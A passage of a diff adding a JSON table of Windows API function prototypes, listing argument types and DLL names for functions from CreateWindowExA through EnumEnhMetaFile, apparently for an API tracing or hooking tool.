"function_name": "CreateWindowExA", + "arguments": [ + "DWORD", + "LPCTSTR", + "LPCTSTR", + "DWORD", + "int", + "int", + "int", + "int", + "HWND", + "HMENU", + "HINSTANCE", + "LPVOID" + ], + "dll_name": "user32.dll", + "full_prototype": "HWND CreateWindowExA( DWORD dwExStyle, LPCTSTR lpClassName, LPCTSTR lpWindowName, DWORD dwStyle, int x, int y, int nWidth, int nHeight, HWND hWndParent, HMENU hMenu, HINSTANCE hInstance, LPVOID lpParam );" + }, + { + "function_name": "CreateWindowExW", + "arguments": [ + "DWORD", + "LPCWSTR", + "LPCWSTR", + "DWORD", + "int", + "int", + "int", + "int", + "HWND", + "HMENU", + "HINSTANCE", + "LPVOID" + ], + "dll_name": "user32.dll", + "full_prototype": "HWND CreateWindowExW(DWORD dwExStyle, LPCWSTR lpClassName, LPCWSTR lpWindowName, DWORD dwStyle, int x, int y, int nWidth, int nHeight, HWND hWndParent, HMENU hMenu, HINSTANCE hInstance, LPVOID lpParam);" + }, + { + "function_name": "CreateWindowStationA", + "arguments": [ + "LPTSTR", + "DWORD", + "DWORD", + "LPSECURITY_ATTRIBUTES" + ], + "dll_name": "user32.dll", + "full_prototype": "HWINSTA CreateWindowStationA(LPTSTR lpwinsta, DWORD dwReserved, DWORD dwDesiredAccess, LPSECURITY_ATTRIBUTES lpsa);" + }, + { + "function_name": "CreateWindowStationW", + "arguments": [ + "LPCWSTR", + "DWORD", + "DWORD", + "LPSECURITY_ATTRIBUTES" + ], + "dll_name": "user32.dll", + "full_prototype": "HWINSTA CreateWindowStationW(LPCWSTR lpwinsta, DWORD dwReserved, DWORD dwDesiredAccess, LPSECURITY_ATTRIBUTES lpsa);" + }, + { + "function_name": "DdeSetQualityOfService", + "arguments": [ + "HWND", + "const SECURITY_QUALITY_OF_SERVICE", + "PSECURITY_QUALITY_OF_SERVICE" + ], + "dll_name": "user32.dll", + "full_prototype": "BOOL DdeSetQualityOfService(HWND hwndClient, const SECURITY_QUALITY_OF_SERVICE *pqosNew, PSECURITY_QUALITY_OF_SERVICE pqosPrev);" + }, + { + "function_name": "DebugActiveProcess", + "arguments": [ + "DWORD" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL DebugActiveProcess( DWORD dwProcessId );" + }, + { + "function_name": "DebugBreak", + "arguments": [ + "" + ], + "dll_name": "kernel32.dll", + "full_prototype": "VOID DebugBreak(VOID);" + }, + { + "function_name": "DefDlgProcA", + "arguments": [ + "HWND", + "UINT", + "WPARAM", + "LPARAM" + ], + "dll_name": "user32.dll", + "full_prototype": "LRESULT DefDlgProcA(HWND hDlg,UINT Msg, WPARAM wParam, LPARAM lParam);" + }, + { + "function_name": "DefDlgProcW", + "arguments": [ + "HWND", + "UINT", + "WPARAM", + "LPARAM" + ], + "dll_name": "user32.dll", + "full_prototype": "LRESULT DefDlgProcW(HWND hDlg,UINT Msg, WPARAM wParam, LPARAM lParam);" + }, + { + "function_name": "DeferWindowPos", + "arguments": [ + "HDWP", + "HWND", + "HWND", + "int", + "int", + "int", + "int", + "UINT" + ], + "dll_name": "user32.dll", + "full_prototype": "HDWP DeferWindowPos(HDWP hWinPosInfo, HWND hWnd, HWND hWndInsertAfter,int x, int y, int cx, int cy, UINT uFlags);" + }, + { + "function_name": "DefFrameProcA", + "arguments": [ + "HWND", + "HWND", + "UINT", + "WPARAM", + "LPARAM" + ], + "dll_name": "user32.dll", + "full_prototype": "LRESULT DefFrameProcA(HWND hWnd, HWND hWndMDIClient, UINT uMsg, WPARAM wParam, LPARAM lParam);" + }, + { + "function_name": "DefFrameProcW", + "arguments": [ + "HWND", + "HWND", + "UINT", + "WPARAM", + "LPARAM" + ], + "dll_name": "user32.dll", + "full_prototype": "LRESULT DefFrameProcW(HWND hWnd, HWND hWndMDIClient, UINT uMsg, WPARAM wParam, LPARAM lParam);" + }, + { + "function_name": "DefineDosDeviceA", + "arguments": [ + "DWORD", + "LPCTSTR", + "LPCTSTR" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL DefineDosDeviceA( DWORD dwFlags, LPCTSTR lpDeviceName, LPCTSTR lpTargetPath );" + }, + { + "function_name": "DefineDosDeviceW", + "arguments": [ + "DWORD", + "LPCWSTR", + "LPCWSTR" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL DefineDosDeviceW(DWORD dwFlags,LPCWSTR lpDeviceName,LPCWSTR lpTargetPath);" + }, + { + "function_name": "DefMDIChildProcA", + "arguments": [ + "HWND", + "UINT", + "WPARAM", + "LPARAM" + ], + "dll_name": "user32.dll", + "full_prototype": "LRESULT DefMDIChildProcA(HWND hWnd, UINT uMsg, WPARAM wParam, LPARAM lParam);" + }, + { + "function_name": "DefMDIChildProcW", + "arguments": [ + "HWND", + "UINT", + "WPARAM", + "LPARAM" + ], + "dll_name": "user32.dll", + "full_prototype": "LRESULT DefMDIChildProcW(HWND hWnd, UINT uMsg, WPARAM wParam, LPARAM lParam);" + }, + { + "function_name": "DefWindowProcA", + "arguments": [ + "HWND", + "UINT", + "WPARAM", + "LPARAM" + ], + "dll_name": "user32.dll", + "full_prototype": "LRESULT DefWindowProcA(HWND hWnd, UINT Msg,WPARAM wParam, LPARAM lParam);" + }, + { + "function_name": "DefWindowProcW", + "arguments": [ + "HWND", + "UINT", + "WPARAM", + "LPARAM" + ], + "dll_name": "user32.dll", + "full_prototype": "LRESULT DefWindowProcW(HWND hwnd, UINT msg, WPARAM wParam, LPARAM lParam);" + }, + { + "function_name": "DeleteAce", + "arguments": [ + "PACL", + "DWORD" + ], + "dll_name": "advapi32.dll", + "full_prototype": "BOOL DeleteAce( PACL pAcl, DWORD dwAceIndex );" + }, + { + "function_name": "DeleteAtom", + "arguments": [ + "ATOM" + ], + "dll_name": "kernel32.dll", + "full_prototype": "ATOM DeleteAtom( ATOM nAtom );" + }, + { + "function_name": "DeleteColorSpace", + "arguments": [ + "HCOLORSPACE" + ], + "dll_name": "gdi32.dll", + "full_prototype": "BOOL DeleteColorSpace(HCOLORSPACE hColorSpace);" + }, + { + "function_name": "DeleteCriticalSection", + "arguments": [ + "LPCRITICAL_SECTION" + ], + "dll_name": "kernel32.dll", + "full_prototype": "VOID DeleteCriticalSection( LPCRITICAL_SECTION lpCriticalSection );" + }, + { + "function_name": "DeleteDC", + "arguments": [ + "HDC" + ], + "dll_name": "gdi32.dll", + "full_prototype": "BOOL DeleteDC(HDC hdc);" + }, + { + "function_name": "DeleteEnhMetaFile", + "arguments": [ + "HENHMETAFILE" + ], + "dll_name": "gdi32.dll", + "full_prototype": "BOOL DeleteEnhMetaFile(HENHMETAFILE hemf);" + }, + { + "function_name": "DeleteFiber", + "arguments": [ + "LPVOID" + ], + "dll_name": "kernel32.dll", + "full_prototype": "VOID DeleteFiber( LPVOID lpFiber);" + }, + { + "function_name": "DeleteFileA", + "arguments": [ + "LPCTSTR" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL DeleteFileA( LPCTSTR lpFileName );" + }, + { + "function_name": "DeleteFileW", + "arguments": [ + "LPCWSTR" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL DeleteFileW( LPCWSTR path );" + }, + { + "function_name": "DeleteMenu", + "arguments": [ + "HMENU", + "UINT", + "UINT" + ], + "dll_name": "user32.dll", + "full_prototype": "BOOL DeleteMenu(HMENU hMenu,UINT uPosition,UINT uFlags);" + }, + { + "function_name": "DeleteMetaFile", + "arguments": [ + "HMETAFILE" + ], + "dll_name": "gdi32.dll", + "full_prototype": "BOOL DeleteMetaFile(HMETAFILE hmf);" + }, + { + "function_name": "DeleteObject", + "arguments": [ + "HGDIOBJ" + ], + "dll_name": "gdi32.dll", + "full_prototype": "BOOL DeleteObject(HGDIOBJ hObject);" + }, + { + "function_name": "DeletePrinter", + "arguments": [ + "HANDLE" + ], + "dll_name": "winspool.drv", + "full_prototype": "BOOL DeletePrinter(HANDLE hPrinter);" + }, + { + "function_name": "DeregisterEventSource", + "arguments": [ + "HANDLE" + ], + "dll_name": "advapi32.dll", + "full_prototype": "BOOL DeregisterEventSource( HANDLE hEventLog );" + }, + { + "function_name": "DescribePixelFormat", + "arguments": [ + "HDC", + "int", + "UINT", + "LPPIXELFORMATDESCRIPTOR" + ], + "dll_name": "gdi32.dll", + "full_prototype": "int DescribePixelFormat(HDC hdc, int iPixelFormat, UINT nBytes, LPPIXELFORMATDESCRIPTOR ppfd);" + }, + { + "function_name": "DestroyAcceleratorTable", + "arguments": [ + "HACCEL" + ], + "dll_name": "user32.dll", + "full_prototype": "BOOL DestroyAcceleratorTable(HACCEL hAccel);" + }, + { + "function_name": "DestroyCaret", + "arguments": [ + "" + ], + "dll_name": "user32.dll", + "full_prototype": "BOOL DestroyCaret(VOID);" + }, + { + "function_name": "DestroyCursor", + "arguments": [ + "HCURSOR" + ], + "dll_name": "user32.dll", + "full_prototype": "BOOL DestroyCursor(HCURSOR hCursor);" + }, + { + "function_name": "DestroyIcon", + "arguments": [ + "HICON" + ], + "dll_name": "user32.dll", + "full_prototype": "BOOL DestroyIcon(HICON hIcon);" + }, + { + "function_name": "DestroyMenu", + "arguments": [ + "HMENU" + ], + "dll_name": "user32.dll", + "full_prototype": "BOOL DestroyMenu(HMENU hMenu);" + }, + { + "function_name": "DestroyPrivateObjectSecurity", + "arguments": [ + "PSECURITY_DESCRIPTOR *" + ], + "dll_name": "advapi32.dll", + "full_prototype": "BOOL DestroyPrivateObjectSecurity( PSECURITY_DESCRIPTOR * ObjectDescriptor );" + }, + { + "function_name": "DestroyWindow", + "arguments": [ + "HWND" + ], + "dll_name": "user32.dll", + "full_prototype": "BOOL DestroyWindow(HWND hWnd);" + }, + { + "function_name": "DeviceCapabilitiesExA", + "arguments": [ + "LPCSTR", + "LPCSTR", + "LPCSTR", + "WORD", + "LPSTR", + "const DEVMODEA*" + ], + "dll_name": "gdi32.dll", + "full_prototype": "DWORD DeviceCapabilitiesA(LPCSTR pDriverName, LPCSTR pDeviceName, LPCSTR pPort, WORD iIndex, LPSTR pOutput, const DEVMODEA* DevMode);" + }, + { + "function_name": "DeviceCapabilitiesExW", + "arguments": [ + "LPCWSTR", + "LPCWSTR", + "LPCWSTR", + "WORD", + "LPWSTR", + "CONST DEVMODEW*" + ], + "dll_name": "gdi32.dll", + "full_prototype": "DWORD DeviceCapabilitiesExW(LPCWSTR pDriverName, LPCWSTR pDeviceName, LPCWSTR pPort, WORD iIndex, LPWSTR pOutput, CONST DEVMODEW* DevMode);" + }, + { + "function_name": "DeviceIoControl", + "arguments": [ + "HANDLE", + "DWORD", + "LPVOID", + "DWORD", + "LPVOID", + "DWORD", + "LPDWORD", + "LPOVERLAPPED" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL DeviceIoControl( HANDLE hDevice, DWORD dwIoControlCode, LPVOID lpInBuffer, DWORD nInBufferSize, LPVOID lpOutBuffer, DWORD nOutBufferSize, LPDWORD lpBytesReturned, LPOVERLAPPED lpOverlapped);" + }, + { + "function_name": "DialogBoxIndirectParamA", + "arguments": [ + "HINSTANCE", + "LPCDLGTEMPLATE", + "HWND", + "DLGPROC", + "LPARAM" + ], + "dll_name": "user32.dll", + "full_prototype": "int DialogBoxIndirectParamA(HINSTANCE hInstance, LPCDLGTEMPLATE hDialogTemplate, HWND hWndParent, DLGPROC lpDialogFunc, LPARAM dwInitParam);" + }, + { + "function_name": "DialogBoxIndirectParamW", + "arguments": [ + "HINSTANCE", + "LPCDLGTEMPLATE", + "HWND", + "DLGPROC", + "LPARAM" + ], + "dll_name": "user32.dll", + "full_prototype": "int DialogBoxIndirectParamW(HINSTANCE hInstance, LPCDLGTEMPLATE hDialogTemplate, HWND hWndParent, DLGPROC lpDialogFunc, LPARAM dwInitParam);" + }, + { + "function_name": "DialogBoxParamA", + "arguments": [ + "HINSTANCE", + "LPCTSTR", + "HWND", + "DLGPROC", + "LPARAM" + ], + "dll_name": "user32.dll", + "full_prototype": "int DialogBoxParamA(HINSTANCE hInstance, LPCTSTR lpTemplateName, HWND hWndParent, DLGPROC lpDialogFunc, LPARAM dwInitParam);" + }, + { + "function_name": "DialogBoxParamW", + "arguments": [ + "HINSTANCE", + "LPCWSTR", + "HWND", + "DLGPROC", + "LPARAM" + ], + "dll_name": "user32.dll", + "full_prototype": "int DialogBoxParamW(HINSTANCE hInstance, LPCWSTR lpTemplateName, HWND hWndParent, DLGPROC lpDialogFunc, LPARAM dwInitParam);" + }, + { + "function_name": "DisableThreadLibraryCalls", + "arguments": [ + "HMODULE" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL DisableThreadLibraryCalls( HMODULE hLibModule );" + }, + { + "function_name": "DisconnectNamedPipe", + "arguments": [ + "HANDLE" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL DisconnectNamedPipe( HANDLE hNamedPipe );" + }, + { + "function_name": "DiskCopyRunDll", + "arguments": [ + "IN LPSTR", + "IN LPSTR", + "IN LPSTR", + "IN LPSTR" + ], + "dll_name": "diskcopy.dll", + "full_prototype": "int DiskCopyRunDll(IN LPSTR Unuse1,IN LPSTR Unuse2,IN LPSTR pszDriveNumber,IN LPSTR Unuse3);" + }, + { + "function_name": "DispatchMessageA", + "arguments": [ + "CONST MSG *" + ], + "dll_name": "user32.dll", + "full_prototype": "LONG DispatchMessageA(CONST MSG * lpmsg);" + }, + { + "function_name": "DispatchMessageW", + "arguments": [ + "const MSG*" + ], + "dll_name": "user32.dll", + "full_prototype": "LRESULT DispatchMessageW(const MSG* msg);" + }, + { + "function_name": "DlgDirListA", + "arguments": [ + "HWND", + "LPTSTR", + "int", + "int", + "UINT" + ], + "dll_name": "user32.dll", + "full_prototype": "int DlgDirListA(HWND hDlg,LPTSTR lpPathSpec, int nIDListBox, int nIDStaticPath, UINT uFileType);" + }, + { + "function_name": "DlgDirListW", + "arguments": [ + "HWND", + "LPWSTR", + "int", + "int", + "UINT" + ], + "dll_name": "user32.dll", + "full_prototype": "int DlgDirListW(HWND hDlg, LPWSTR lpPathSpec, int nIDListBox, int nIDStaticPath, UINT uFileType);" + }, + { + "function_name": "DlgDirListComboBoxA", + "arguments": [ + "HWND", + "LPTSTR", + "int", + "int", + "UINT" + ], + "dll_name": "user32.dll", + "full_prototype": "int DlgDirListComboBoxA(HWND hDlg, LPTSTR lpPathSpec, int nIDComboBox, int nIDStaticPath, UINT uFiletype);" + }, + { + "function_name": "DlgDirListComboBoxW", + "arguments": [ + "HWND", + "LPWSTR", + "int", + "int", + "UINT" + ], + "dll_name": "user32.dll", + "full_prototype": "int DlgDirListComboBoxW(HWND hDlg, LPWSTR lpPathSpec, int nIDComboBox, int nIDStaticPath,UINT uFiletype);" + }, + { + "function_name": "DlgDirSelectComboBoxExA", + "arguments": [ + "HWND", + "LPTSTR", + "int", + "int" + ], + "dll_name": "user32.dll", + "full_prototype": "BOOL DlgDirSelectComboBoxExA(HWND hDlg, LPTSTR lpString, int nCount, int nIDComboBox);" + }, + { + "function_name": "DlgDirSelectComboBoxExW", + "arguments": [ + "HWND", + "LPWSTR", + "int", + "int" + ], + "dll_name": "user32.dll", + "full_prototype": "BOOL DlgDirSelectComboBoxExW(HWND hDlg, LPWSTR lpString, int nCount, int nIDComboBox);" + }, + { + "function_name": "DlgDirSelectExA", + "arguments": [ + "HWND", + "LPTSTR", + "int", + "int" + ], + "dll_name": "user32.dll", + "full_prototype": "BOOL DlgDirSelectExA(HWND hDlg, LPTSTR lpString, int nCount,int nIDListBox);" + }, + { + "function_name": "DlgDirSelectExW", + "arguments": [ + "HWND", + "LPWSTR", + "int", + "int" + ], + "dll_name": "user32.dll", + "full_prototype": "BOOL DlgDirSelectExW(HWND hDlg, LPWSTR lpString, int nCount,int nIDListBox);" + }, + { + "function_name": "DllGetVersion", + "arguments": [ + "DLLVERSIONINFO" + ], + "dll_name": "shell32.dll", + "full_prototype": "HRESULT CALLBACK DllGetVersion(DLLVERSIONINFO *pdvi);" + }, + { + "function_name": "DosDateTimeToFileTime", + "arguments": [ + "WORD", + "WORD", + "LPFILETIME" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL DosDateTimeToFileTime( WORD wFatDate, WORD wFatTime, LPFILETIME lpFileTime );" + }, + { + "function_name": "DPtoLP", + "arguments": [ + "HDC", + "LPPOINT", + "int" + ], + "dll_name": "gdi32.dll", + "full_prototype": "BOOL DPtoLP(HDC hdc, LPPOINT lpPoints, int nCount);" + }, + { + "function_name": "DragAcceptFiles", + "arguments": [ + "HWND", + "BOOL" + ], + "dll_name": "shell32.dll", + "full_prototype": "VOID DragAcceptFiles(HWND hWnd,BOOL fAccept);" + }, + { + "function_name": "DragDetect", + "arguments": [ + "HWND", + "POINT" + ], + "dll_name": "user32.dll", + "full_prototype": "BOOL DragDetect(HWND hwnd, POINT pt);" + }, + { + "function_name": "DragObject", + "arguments": [ + "HWND", + "HWND", + "UINT", + "DWORD", + "HCURSOR" + ], + "dll_name": "user32.dll", + "full_prototype": "DWORD DragObject(HWND hWndScope, HWND hWndObj, UINT wObjType, DWORD hOfStruct, HCURSOR hDragCursor);" + }, + { + "function_name": "DragFinish", + "arguments": [ + "HDROP" + ], + "dll_name": "shell32.dll", + "full_prototype": "VOID DragFinish(HDROP hDrop);" + }, + { + "function_name": "DragQueryFile", + "arguments": [ + "HDROP", + "UINT", + "LPTSTR", + "UINT" + ], + "dll_name": "shell32.dll", + "full_prototype": "UINT DragQueryFile(HDROP hDrop,UINT iFile,LPTSTR lpszFile,UINT cch);" + }, + { + "function_name": "DrawAnimatedRects", + "arguments": [ + "HWND", + "int", + "CONST RECT *", + "CONST RECT *" + ], + "dll_name": "user32.dll", + "full_prototype": "BOOL DrawAnimatedRects(HWND hwnd, int idAni, CONST RECT * lprcFrom, CONST RECT * lprcTo);" + }, + { + "function_name": "DrawCaption", + "arguments": [ + "HDC", + "LPRECT", + "HFONT", + "HICON", + "LPSTR", + "WORD" + ], + "dll_name": "user32.dll", + "full_prototype": "void DrawCaption(HDC hdc, LPRECT lprc, HFONT hfont, HICON hicon, LPSTR lpszText, WORD wFlags);" + }, + { + "function_name": "DrawEdge", + "arguments": [ + "HDC", + "LPRECT", + "UINT", + "UINT" + ], + "dll_name": "user32.dll", + "full_prototype": "BOOL DrawEdge(HDC hdc,LPRECT qrc, UINT edge, UINT grfFlags);" + }, + { + "function_name": "DrawEscape", + "arguments": [ + "HDC", + "int", + "int", + "LPCSTR" + ], + "dll_name": "gdi32.dll", + "full_prototype": "int DrawEscape(HDC hdc, int nEscape, int cbInput, LPCSTR lpszInData);" + }, + { + "function_name": "DrawFocusRect", + "arguments": [ + "HDC", + "CONST RECT *" + ], + "dll_name": "user32.dll", + "full_prototype": "BOOL DrawFocusRect(HDC hDC, CONST RECT * lprc);" + }, + { + "function_name": "DrawFrameControl", + "arguments": [ + "HDC", + "LPRECT", + "UINT", + "UINT" + ], + "dll_name": "user32.dll", + "full_prototype": "BOOL DrawFrameControl(HDC hdc, LPRECT lprc, UINT uType, UINT uState);" + }, + { + "function_name": "DrawIcon", + "arguments": [ + "HDC", + "int", + "int", + "HICON" + ], + "dll_name": "user32.dll", + "full_prototype": "BOOL DrawIcon(HDC hDC,int X,int Y,HICON hIcon);" + }, + { + "function_name": "DrawIconEx", + "arguments": [ + "HDC", + "int", + "int", + "HICON", + "int", + "int", + "UINT", + "HBRUSH", + "UINT" + ], + "dll_name": "user32.dll", + "full_prototype": "BOOL DrawIconEx(HDC hdc, int xLeft, int yTop, HICON hIcon, int cxWidth, int cyWidth, UINT istepIfAniCur, HBRUSH hbrFlickerFreeDraw,UINT diFlags);" + }, + { + "function_name": "DrawMenuBar", + "arguments": [ + "HWND" + ], + "dll_name": "user32.dll", + "full_prototype": "BOOL DrawMenuBar(HWND hWnd);" + }, + { + "function_name": "DrawStateA", + "arguments": [ + "HDC", + "HBRUSH", + "DRAWSTATEPROC", + "LPARAM", + "WPARAM", + "int", + "int", + "int", + "int", + "UINT" + ], + "dll_name": "user32.dll", + "full_prototype": "BOOL DrawStateA(HDC hdc, HBRUSH hbr, DRAWSTATEPROC lpOutputFunc, LPARAM lData, WPARAM wData, int x,int y, int cx, int cy, UINT fuFlags);" + }, + { + "function_name": "DrawStateW", + "arguments": [ + "HDC", + "HBRUSH", + "DRAWSTATEPROC", + "LPARAM", + "WPARAM", + "int", + "int", + "int", + "int", + "UINT" + ], + "dll_name": "user32.dll", + "full_prototype": "BOOL DrawStateW(HDC hdc, HBRUSH hbr, DRAWSTATEPROC lpOutputFunc, LPARAM lData, WPARAM wData, int x,int y, int cx, int cy, UINT fuFlags);" + }, + { + "function_name": "DrawTextA", + "arguments": [ + "HDC", + "LPCTSTR", + "int", + "LPRECT", + "UINT" + ], + "dll_name": "user32.dll", + "full_prototype": "int DrawTextA(HDC hDC, LPCTSTR lpString, int nCount, LPRECT lpRect, UINT uFormat);" + }, + { + "function_name": "DrawTextW", + "arguments": [ + "HDC", + "LPCWSTR", + "int", + "LPRECT", + "UINT" + ], + "dll_name": "user32.dll", + "full_prototype": "int DrawTextW(HDC hDC, LPCWSTR lpString, int nCount, LPRECT lpRect, UINT uFormat);" + }, + { + "function_name": "DrawTextExA", + "arguments": [ + "HDC", + "LPTSTR", + "int", + "LPRECT", + "UINT", + "LPDRAWTEXTPARAMS" + ], + "dll_name": "user32.dll", + "full_prototype": "int DrawTextExA(HDC hdc, LPTSTR lpchText, int cchText, LPRECT lprc, UINT dwDTFormat, LPDRAWTEXTPARAMS lpDTParams);" + }, + { + "function_name": "DrawTextExW", + "arguments": [ + "HDC", + "LPWSTR", + "int", + "LPRECT", + "UINT", + "LPDRAWTEXTPARAMS" + ], + "dll_name": "user32.dll", + "full_prototype": "int DrawTextExW(HDC hdc, LPWSTR lpchText, int cchText, LPRECT lprc, UINT dwDTFormat, LPDRAWTEXTPARAMS lpDTParams);" + }, + { + "function_name": "DuplicateHandle", + "arguments": [ + "HANDLE", + "HANDLE", + "HANDLE", + "LPHANDLE", + "DWORD", + "BOOL", + "DWORD" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL DuplicateHandle( HANDLE hSourceProcessHandle, HANDLE hSourceHandle, HANDLE hTargetProcessHandle, LPHANDLE lpTargetHandle, DWORD dwDesiredAccess, BOOL bInheritHandle, DWORD dwOptions );" + }, + { + "function_name": "DuplicateIcon", + "arguments": [ + "HINSTANCE", + "HICON" + ], + "dll_name": "shell32.dll", + "full_prototype": "HICON DuplicateIcon(HINSTANCE hInst,HICON hIcon);" + }, + { + "function_name": "DuplicateToken", + "arguments": [ + "HANDLE", + "SECURITY_IMPERSONATION_LEVEL", + "PHANDLE" + ], + "dll_name": "advapi32.dll", + "full_prototype": "BOOL DuplicateToken( HANDLE ExistingTokenHandle, SECURITY_IMPERSONATION_LEVEL ImpersonationLevel, PHANDLE DuplicateTokenHandle );" + }, + { + "function_name": "DuplicateTokenEx", + "arguments": [ + "HANDLE", + "DWORD", + "LPSECURITY_ATTRIBUTES", + "SECURITY_IMPERSONATION_LEVEL", + "TOKEN_TYPE", + "PHANDLE" + ], + "dll_name": "advapi32.dll", + "full_prototype": "BOOL DuplicateTokenEx(HANDLE hExistingToken,DWORD dwDesiredAccess,LPSECURITY_ATTRIBUTES lpTokenAttributes,SECURITY_IMPERSONATION_LEVEL ImpersonationLevel,TOKEN_TYPE TokenType,PHANDLE phNewToken);" + }, + { + "function_name": "DvdLauncher", + "arguments": [ + "HWND", + "CHAR" + ], + "dll_name": "storprop.dll", + "full_prototype": "BOOL DvdLauncher(HWND HWnd,CHAR DriveLetter);" + }, + { + "function_name": "Ellipse", + "arguments": [ + "HDC", + "int", + "int", + "int", + "int" + ], + "dll_name": "gdi32.dll", + "full_prototype": "BOOL Ellipse(HDC hdc,int nLeftRect,int nTopRect,int nRightRect,int nBottomRect);" + }, + { + "function_name": "EmptyClipboard", + "arguments": [ + "" + ], + "dll_name": "user32.dll", + "full_prototype": "BOOL EmptyClipboard(VOID);" + }, + { + "function_name": "EnableMenuItem", + "arguments": [ + "HMENU", + "UINT", + "UINT" + ], + "dll_name": "user32.dll", + "full_prototype": "BOOL EnableMenuItem(HMENU hMenu,UINT uIDEnableItem,UINT uEnable);" + }, + { + "function_name": "EnableScrollBar", + "arguments": [ + "HWND", + "UINT", + "UINT" + ], + "dll_name": "user32.dll", + "full_prototype": "BOOL EnableScrollBar(HWND hWnd,UINT wSBflags,UINT wArrows);" + }, + { + "function_name": "EnableWindow", + "arguments": [ + "HWND", + "BOOL" + ], + "dll_name": "user32.dll", + "full_prototype": "BOOL EnableWindow(HWND hWnd,BOOL bEnable);" + }, + { + "function_name": "EndDeferWindowPos", + "arguments": [ + "HDWP" + ], + "dll_name": "user32.dll", + "full_prototype": "BOOL EndDeferWindowPos(HDWP hWinPosInfo);" + }, + { + "function_name": "EndDialog", + "arguments": [ + "HWND", + "int" + ], + "dll_name": "user32.dll", + "full_prototype": "BOOL EndDialog(HWND hDlg, int nResult);" + }, + { + "function_name": "EndDoc", + "arguments": [ + "HDC" + ], + "dll_name": "gdi32.dll", + "full_prototype": "int EndDoc(HDC hdc);" + }, + { + "function_name": "EndPage", + "arguments": [ + "HDC" + ], + "dll_name": "gdi32.dll", + "full_prototype": "int EndPage(HDC hdc);" + }, + { + "function_name": "EndPaint", + "arguments": [ + "HWND", + "CONST PAINTSTRUCT" + ], + "dll_name": "user32.dll", + "full_prototype": "BOOL EndPaint(HWND hWnd, CONST PAINTSTRUCT *lpPaint);" + }, + { + "function_name": "EndPath", + "arguments": [ + "HDC" + ], + "dll_name": "gdi32.dll", + "full_prototype": "BOOL EndPath(HDC hdc);" + }, + { + "function_name": "EndUpdateResourceA", + "arguments": [ + "HANDLE", + "BOOL" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL EndUpdateResourceA( HANDLE hUpdate, BOOL fDiscard );" + }, + { + "function_name": "EndUpdateResourceW", + "arguments": [ + "HANDLE", + "BOOL" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL EndUpdateResourceW(HANDLE hUpdate,BOOL fDiscard);" + }, + { + "function_name": "EnterCriticalSection", + "arguments": [ + "LPCRITICAL_SECTION" + ], + "dll_name": "kernel32.dll", + "full_prototype": "VOID EnterCriticalSection( LPCRITICAL_SECTION lpCriticalSection );" + }, + { + "function_name": "EnumCalendarInfoA", + "arguments": [ + "CALINFO_ENUMPROC", + "LCID", + "CALID", + "CALTYPE" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL EnumCalendarInfoA( CALINFO_ENUMPROC lpCalInfoEnumProc, LCID Locale, CALID Calendar, CALTYPE CalType );" + }, + { + "function_name": "EnumCalendarInfoW", + "arguments": [ + "CALINFO_ENUMPROCW", + "LCID", + "CALID", + "CALTYPE" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL EnumCalendarInfoW( CALINFO_ENUMPROCW calinfoproc, LCID locale, CALID calendar, CALTYPE caltype );" + }, + { + "function_name": "EnumChildWindows", + "arguments": [ + "HWND", + "WNDENUMPROC", + "LPARAM" + ], + "dll_name": "user32.dll", + "full_prototype": "BOOL EnumChildWindows(HWND hWndParent,WNDENUMPROC lpEnumFunc, LPARAM lParam);" + }, + { + "function_name": "EnumClipboardFormats", + "arguments": [ + "UINT" + ], + "dll_name": "user32.dll", + "full_prototype": "UINT EnumClipboardFormats(UINT format);" + }, + { + "function_name": "EnumDateFormatsA", + "arguments": [ + "DATEFMT_ENUMPROC", + "LCID", + "DWORD" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL EnumDateFormatsA( DATEFMT_ENUMPROC lpDateFmtEnumProc, LCID Locale, DWORD dwFlags );" + }, + { + "function_name": "EnumDateFormatsW", + "arguments": [ + "DATEFMT_ENUMPROCW", + "LCID", + "DWORD" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL EnumDateFormatsW( DATEFMT_ENUMPROCW lpDateFmtEnumProc, LCID Locale, DWORD dwFlags);" + }, + { + "function_name": "EnumDesktopsA", + "arguments": [ + "HWINSTA", + "DESKTOPENUMPROC", + "LPARAM" + ], + "dll_name": "user32.dll", + "full_prototype": "BOOL EnumDesktopsA(HWINSTA hwinsta, DESKTOPENUMPROC lpEnumFunc, LPARAM lParam);" + }, + { + "function_name": "EnumDesktopsW", + "arguments": [ + "HWINSTA", + "DESKTOPENUMPROCW", + "LPARAM" + ], + "dll_name": "user32.dll", + "full_prototype": "BOOL EnumDesktopsW(HWINSTA hwinsta, DESKTOPENUMPROCW lpEnumFunc, LPARAM lParam);" + }, + { + "function_name": "EnumDesktopWindows", + "arguments": [ + "HDESK", + "WNDENUMPROC", + "LPARAM" + ], + "dll_name": "user32.dll", + "full_prototype": "BOOL EnumDesktopWindows(HDESK hDesktop, WNDENUMPROC lpfn, LPARAM lParam);" + }, + { + "function_name": "EnumDisplaySettingsA", + "arguments": [ + "LPCTSTR", + "DWORD", + "LPDEVMODE" + ], + "dll_name": "user32.dll", + "full_prototype": "BOOL EnumDisplaySettingsA(LPCTSTR lpszDeviceName,DWORD iModeNum,LPDEVMODE lpDevMode);" + }, + { + "function_name": "EnumDisplaySettingsW", + "arguments": [ + "LPCWSTR", + "DWORD", + "PDEVMODEW" + ], + "dll_name": "user32.dll", + "full_prototype": "BOOL EnumDisplaySettingsW(LPCWSTR lpszDeviceName, DWORD iModeNum, PDEVMODEW lpDevMode);" + }, + { + "function_name": "EnumEnhMetaFile", + "arguments": [ + "HDC", + "HENHMETAFILE", + "ENHMFENUMPROC", + "LPVOID", + "CONST RECT *" + ], + "dll_name": "gdi32.dll", + "full_prototype": "BOOL EnumEnhMetaFile(HDC hdc, HENHMETAFILE hemf, ENHMFENUMPROC lpEnhMetaFunc, LPVOID lpData,CONST RECT * 